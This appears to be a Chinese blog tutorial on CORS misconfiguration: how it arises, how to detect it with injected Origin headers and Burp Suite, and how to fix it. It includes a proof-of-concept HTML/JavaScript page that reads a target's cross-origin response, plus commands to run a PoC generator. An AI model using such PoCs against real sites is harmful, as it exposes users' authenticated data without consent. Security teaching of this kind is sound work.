漏洞分析 | CORS讲解与实战利用

最新推荐文章于 2024-06-05 19:00:37 发布
最新推荐文章于 2024-06-05 19:00:37 发布
阅读量1.4k 收藏 23
点赞数 30
文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/137858944
版权

产生原因

同源策略:如果两个URL的协议、域名、端口号都相同,就称这两个URL同源。

同源策略(SOP)限制了应用程序之间的信息共享,并且仅允许在托管应用程序的域内共享。这有效防止了系统机密信息的泄露。但与此同时,也带来了另外的问题。随着Web应用程序和微服务使用的日益增长,出于实用目的往往需要将信息从一个子域传递到另一个子域,或者在不同域之间进行传递(例如将访问令牌和会话标识符,传递给另一个应用程序)。

为了允许跨域通信,开发人员必须使用不同的技术来绕过SOP并传递敏感信息,以至于现今也成为了一个棘手的安全问题。因此,为了在不影响应用程序安全状态的情况下实现信息共享,在HTML5中引入了跨源资源共享(CORS)。但问题也随之而来,许多人为了方便干脆直接使用默认的配置,或是由于缺乏对此的了解而导致了错误的配置。

CORS跨域资源共享

CORS,跨域资源共享(Cross-origin resource sharing),这种机制通过添加HTTP字段的方式规定服务器资源允许被哪些域访问(Access-Control-Allow-Origin)、请求中是否允许发送cookie(Access-Control-Allow-Credentials)、哪些请求类型是被允许的(Access-Control-Request-Method)等等。

手工验证方式

在正常的api请求处,headers加入”origin”:”http://xx.xx.xx.xx“, 如果接口正常返回了数据且headers里包含:

access-control-allow-credentials : trueaccess-control-allow-origin : http://xx.xx.xx.xx

就说明这个接口确实存在CORS漏洞。

实战技巧

使用 burpsuite 选择 Proxy 模块中的 Options 选项,找到Match and Replace这一栏,勾选Request header 将空替换为Origin:foo.example.org的 Enable框。

图片


HTTP history列表中出现符合条件的请求包,发送到Repeater中,点击GO,若存在如下图所示,即该处可能有CORS漏洞。

图片

响应包组合应是这种(存在CORS):

 

  1.  
    Access-Control-Allow-Origin: foo.example.org
     
  2.  
    Access-Control-Allow-Credentials: true
     
 

注意!如下组合是没有漏洞的。因为浏览器已经会阻止如下配置。(不存在CORS)
 

 

  1.  
    Access-Control-Allow-Origin: *
     
  2.  
    Access-Control-Allow-Credentials: true
     
 

利用效果:
 

图片
 

实战:
 

抓包发现请求头中存在Origin,将其修改为*
 

发现Access-Control-Allow-Origin:返回的*
  
 

图片
 


 该处的数据包,所有域可以访问本域的资源。说明该接口可能存在CORS漏洞。
 

以GET的形式POC
 

 

  1.  
    <!DOCTYPE>
     
  2.  
    <html>
     
  3.  
    <script type="text/javascript">
     
  4.  
    function loadXMLDoc()
     
  5.  
    {
     
  6.  
    var xhr = new XMLHttpRequest();
     
  7.  
     
  8.  
    xhr.onreadystatechange=function()
     
  9.  
    {
     
  10.  
    if(xhr.readyState == 4 && xhr.status == 200) //if receive xhr response
     
  11.  
    {
     
  12.  
    var datas=xhr.responseText;
     
  13.  
    alert(datas);
     
  14.  
    }
     
  15.  
    }
     
  16.  
    //request vuln page
     
  17.  
    xhr.open("GET","http://www.target.com","true") //网页地址
     
  18.  
    xhr.send();
     
  19.  
    }
     
  20.  
    loadXMLDoc();
     
  21.  
    </script>
     
  22.  
    </html>
     
 

 

图片
 

不存在CORS漏洞的情况下
 

当进行利用的时候,爆出底下红色部分时:
 

 

图片
 


 则不存在CORS,不允许跨域。
 

工具推荐
 

下载地址:https://github.com/0verSp4ce/PoCBox
 

docker安装:
 

拉取镜像:
 

 

docker pull registry.cn-hangzhou.aliyuncs.com/pocbox/pocbox:1.0
 

运行:
 

 

docker container run -d -p 76:80 registry.cn-hangzhou.aliyuncs.com/pocbox/pocbox:1.0
 

访问:
 

 

http://ip:76
 

本地搭建好后在图示处填入相关数据后即可生成poc code
 

 

图片
 

利用过程:
 

 

图片
 

效果图如下:
 

 

图片
 


 其中CORS漏洞存在GET方式和POST方式,具体根据实战情况。
 

 

修复建议
 

 
 
1、关闭非正式开启的CORS
 2、白名单限制:定义“源”的白名单,避免使用正则表达式,不要配置Access-Control-Allow-Origin为通配符*或null,严格效验来自请求数据包中Origin的值
 3、仅允许使用安全协议,避免中间人攻击
 

 

  申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。
 

免费领取安全学习资料包!
 

渗透工具
 

 

技术文档、书籍
 

 
 

 

面试题
 

帮助你在面试中脱颖而出
 

 

视频
 

基础到进阶
 

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
 

 
 

 

应急响应笔记
 

 

学习路线
 


                

        

        

    




    

      

        

            

              
                
                  渗透测试老鸟-九青
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    30
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    23
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
CORS原理及漏洞利用

				
			

			

				

					weixin_50464560的博客
				

				

					10-01
					
					1535
					
				

			

		

		

			
				
转载至https://threezh1.com/2020/02/19/CORS%E5%8E%9F%E7%90%86%E5%8F%8A%E5%88%A9%E7%94%A8%E6%95%B4%E7%90%86/

刚入门的时候也学习过CORS,那个时候的对寻找漏洞的标准是:
1修改`Origin:`,使得返回的HTTP字段中的`Access-Control-Allow-Origin: `出现你所输入的值,表明此网站存在CSOR漏洞
原理、利用、绕过都没有进一步了解。这次趁着实习的机会,好好的将CORS相关知识总

			
		

	



                

              
                



	

		

			

				
					
CORS-POC-Generator:Web脚本,使用HTML CSS和JS生成CORS漏洞的POC

				
			

			

				

					04-07
				

			

		

		

			
				
CORS-POC生成器
Web脚本使用HTML CSS和JS生成CORS漏洞的POC。
 输入URL,如果您看到带有JSON数据的警报,则单击“生成”,然后利用它的可利用性,否则找到另一个端点。
安装
克隆回购文件并运行索引文件吧!
 或实时生成:  :

			
		

	



                


  
              

                


	

		

			

				
					
常见的Web漏洞——CORS

					
最新发布

				
			

			

				

					江左盟的博客
				

				

					06-05
					
					816
					
				

			

		

		

			
				
渗透做了多年的朋友都知道,大洞小洞都是漏洞。因此也学习、沉淀一下以前没重视的漏洞CORS漏洞原理、检测和利用方法。

			
		

	





	

		

			

				
					
跨域资源共享CORS漏洞

					
热门推荐

				
			

			

				

					LuckySec
				

				

					08-22
					
					1万+
					
				

			

		

		

			
				
0x01 漏洞简介
跨域资源共享(CORS)是一种放宽同源策略的机制,它允许浏览器向跨源服务器,发出 XMLHttpRequest 请求,从而克服了 AJAX 只能同源使用的限制,以使不同的网站可以跨域获取数据,目前已经被绝大多数浏览器支持,并被主流网站广泛部署使用。跨域资源共享 CORS 漏洞主要是由于程序员配置不当,对于 Origin 源校验不严格,从而造成跨域问题,攻击者可以利用 CORS 错误配置漏洞,从恶意网站跨域读取受害网站的敏感信息。

这里只做简单介绍,关于 CORS 漏洞的详细分析可以点击

			
		

	



		

			
		



	

		

			

				
					
CORS跨域资源共享漏洞的复现、分析利用及修复过程

				
			

			

				

					qq_50854662的博客
				

				

					01-04
					
					5984
					
				

			

		

		

			
				
CORS跨域资源共享漏洞的复现、分析利用及修复过程

			
		

	





	

		

			

				
					
CORS跨域资源共享漏洞复现——详细利用方法,漏洞危害最大化

				
			

			

				

					面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
				

				

					06-15
					
					4637
					
				

			

		

		

			
				
CORS跨域资源共享漏洞漏洞复现,cors利用方式以及让危害最大化。

			
		

	





	

		

			

				
					
CORS跨域访问漏洞

				
			

			

				

					m0_73896875的博客
				

				

					07-13
					
					5763
					
				

			

		

		

			
				
全称是“跨域资源访问共享”(Cross-Origin Resource Sharing),是一种用于解决跨域资源访问限制的机制。它允许在浏览器中进行跨域请求,并控制跨域请求的安全性。同源策略(Same-Origin Policy)是浏览器的一种安全策略,它要求在访问资源时,请求的域名、协议和端口必须与资源所在的域名、协议和端口完全匹配。如果两个资源的域名、协议和端口不匹配,浏览器会限制跨域请求,并阻止脚本访问返回的响应数据。CORS 提供了一种机制,允许服务器端声明它所支持的跨域请求。

			
		

	





	

		

			

				
					
用于检测HTTP请求头缺失和CORS跨域漏洞的工具

				
			

			

				

					07-02
				

			

		

		

			
				
CORS配置错误可能导致安全漏洞,如未授权的数据访问或攻击者利用跨站请求伪造(CSRF)攻击。  工具的使用主要包括以下几个关键知识点:  1. **HTTP请求头检查**:  - **Content-Type**:检查是否正确指定了请求体...

			
		

	





	

		

			

				
					
XRCross:XRCross是一个重构,扫描程序,并且是渗透BugBounty测试的工具。 该工具旨在测试(XSS | SSRF | CORS | SSTI | IDOR | RCE | LFI | SQLI)漏洞

				
			

			

				

					03-31
				

			

		

		

			
				
 This tool was built to test (XSS|SSRF|CORS|SSTI|IDOR|RCE|LFI|SQLI) vulnerabilities :check_mark: 选项: Example: XRCross -u/--url example.site <arguments> Optional Arguments: -h /--help | show this ...

			
		

	





	

		

			

				
					
PyPI 官网下载 | cors-0.9.6-py3-none-any.whl

				
			

			

				

					02-09
				

			

		

		

			
				
**PyPI 官网下载 | cors-0.9.6-py3-none-any.whl**  在Python的世界里,PyPI(Python Package Index)是官方的第三方软件包仓库,它为开发者提供了一个平台来发布和分享他们的Python库。PyPI允许用户通过pip(Python...

			
		

	





	

		

			

				
					
华测RTK与CORS站测地通简要操作说明.pdf

				
			

			

				

					07-14
				

			

		

		

			
				
《华测RTK与CORS站测地通简要操作说明》  华测RTK(Real-Time Kinematic)系统是一种高精度的全球定位系统(GPS)技术,它结合了CORS(Continuously Operating Reference Stations)站的数据,可以提供实时厘米级的...

			
		

	





	

		

			

				
					
你可能不知道的CORS跨域资源共享

				
			

			

				

					10-17
				

			

		

		

			
				
CORS(跨域资源共享)是Web开发中解决跨域访问问题的一种机制,它允许浏览器在遵循同源策略的前提下,通过特定的HTTP头部与服务器通信,从而实现不同源之间的资源访问。这种机制是为了解决现代Web应用中由于同源策略...

			
		

	





	

		

			

				
					
第40篇:CORS跨域资源共享漏洞的复现、分析利用及修复过程

				
			

			

				

					ABC_123的博客
				

				

					12-25
					
					4784
					
				

			

		

		

			
				
Part1 前言CORS跨域资源共享漏洞与JSONP劫持漏洞类似,都是程序员在解决跨域问题中进行了错误的配置。攻击者可以利用Web应用对用户请求数据包的Origin头校验不严格,诱骗受害者访问攻击者制作好的恶意网站,从而跨域获取受害者的敏感数据,包括转账记录、交易记录、个人身份证号信息、订单信息等等。近几年在很多的渗透测试报告中,CORS跨域资源共享漏洞越来越多了。有的朋友实在挖不出漏洞,偶尔...

			
		

	





	

		

			

				
					
关于CORS利用的一些方法

				
			

			

				

					m0_48520508的博客
				

				

					07-17
					
					1100
					
				

			

		

		

			
				
嗨,大家好
我叫Ayoub,我是摩洛哥的安全研究员。在本文中,我将描述两种如何利用CORS错误配置的情况:第一种情况基于XSS,需要在范围之外进行思考,第二种情况是基于高级CORS利用技术。
注意:在开始阅读本文之前,您需要对CORS是什么以及如何利用错误配置有基本的了解。以下是一些很棒的帖子,可让你了解他的用法:
https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/
https

			
		

	





	

		

			

				
					
CORS漏洞利用检测和利用方式

				
			

			

				

					凝聚力安全团队
				

				

					09-01
					
					4769
					
				

			

		

		

			
				
CORS漏洞利用检测和利用方式
CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求。
检测方式:
1.curl访问网站
curl https://www.junsec.com -H "Origin: https://test.com" -I

检查返回包的 Access-Control-Allow-Origin 字段是否为https://test.com
2.burpsuite发送请求包,

			
		

	





	

		

			

				
					
CORS漏洞利用方式的学习(精)

				
			

			

				

					墨痕诉清风的博客
				

				

					10-06
					
					4257
					
				

			

		

		

			
				
返回信息主体是用户敏感信息,需注意的是返回的Access-Control-Allow-Origin是攻击者服务器,这意味着系统存在CORS配置错误。如果支持可以使用iframe跨域请求,绕过。修改一下reqListener()函数为。同理结合上面代码,发送到你的服务器。同上,判断是否支持null。.....................................................................

			
		

	





	

		

			

				
					
CORS跨域资源共享漏洞

				
			

			

				

					m0_55772907的博客
				

				

					10-19
					
					9182
					
				

			

		

		

			
				
cors漏洞

			
		

	





	

		

			

				
					
一次CORS漏洞的手工验证

				
			

			

				

					路漫漫其修远
				

				

					01-05
					
					5016
					
				

			

		

		

			
				
给项目接口做安全扫描的时候,发现有个CORS漏洞:

但仅仅扫出来还不够,需要手工验证一下
手工验证方式
在正常的api请求处,headers加入"origin":"http://xx.xx.xx.xx", 如果接口正常返回了数据且headers里包含
access-control-allow-credentials : true
access-control-allow-origin : http://xx.xx.xx.xx

就说明这个接口确实存在CORS漏洞

poc代码
<html>
&

			
		

	





	

		

			

				
					
cors跨域漏洞概述

				
			

			

				

					10-11
				

			

		

		

			
				
CORS(跨来源资源共享)是一个用于浏览器和服务器之间通信的机制,它允许服务器在响应中添加一些响应头来明确指示哪些域被允许访问该资源。由于同源策略的限制,浏览器通常不允许从一个源加载另一个源的资源,但如果服务器明确指定了某些域可以访问该资源,浏览器就会允许跨域请求。

然而,CORS 也存在一些安全风险。其中最常见的是 CORS 跨域漏洞,攻击者可以利用这种漏洞来盗取用户数据或执行恶意脚本。攻击者可能会伪造一个跨域请求,然后向服务器发送一个 HTTP 请求,服务器在响应中添加了允许其它域名访问该资源的头部,攻击者就能够获取到服务器返回的数据。

为了防止 CORS 跨域漏洞,服务器需要对来自非法域名的跨域请求进行严格检查,并且不要将敏感信息包含在跨域响应中。



			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值